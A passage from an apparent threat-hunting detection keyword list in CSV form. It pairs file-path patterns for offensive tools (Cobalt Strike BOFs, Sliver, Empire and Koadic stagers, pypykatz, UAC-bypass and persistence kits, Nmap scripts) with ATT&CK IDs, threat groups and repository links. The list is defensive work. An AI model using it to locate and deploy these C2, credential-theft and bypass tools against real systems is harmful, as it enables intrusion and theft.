T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*/srdi-shellcode.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/ssh2-enum-algos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssh-auth-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssh-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssh-hostkey.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssh-publickey-acceptance.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssh-run.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sshv1.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-ccs-injection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-cert.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-cert-intaddr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-date.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-dh-params.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-enum-ciphers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-heartbleed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-known-key.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-poodle.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sslv2.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sslv2-drown.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssp/decryptor.py,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*/SspiUacBypass.git*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,1,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*/ssploit/*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*/SSRFmap*,offensive_tool_keyword,SSRFmap,Automatic SSRF fuzzer and exploitation tool,T1210 - T1211 - T1212 - T1574,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/swisskyrepo/SSRFmap,1,1,N/A,N/A,10,2463,459,2023-05-27T19:30:08Z,2018-10-15T19:08:26Z -*/sstp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/StackCrypt.git*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*/stage_wmi*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/stager.ps1*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/stager/powershell.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/stager/powershell/payload.ps1*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/stagers/*.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/stagers/CSharpPS*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - 
T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/start_campaign.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/StaticSyscallsAPCSpawn/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z 
-*/StaticSyscallsInject/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/StayKit.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*/Staykit/StayKit.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*/stinger_client.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/striker.c,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/Striker.git*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/striker.local*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/striker.py,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/string_of_paerls.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/stun-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/stun-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/stuxnet-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/subdomain.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/subdomains.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*/subdomains-10000.txt*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information 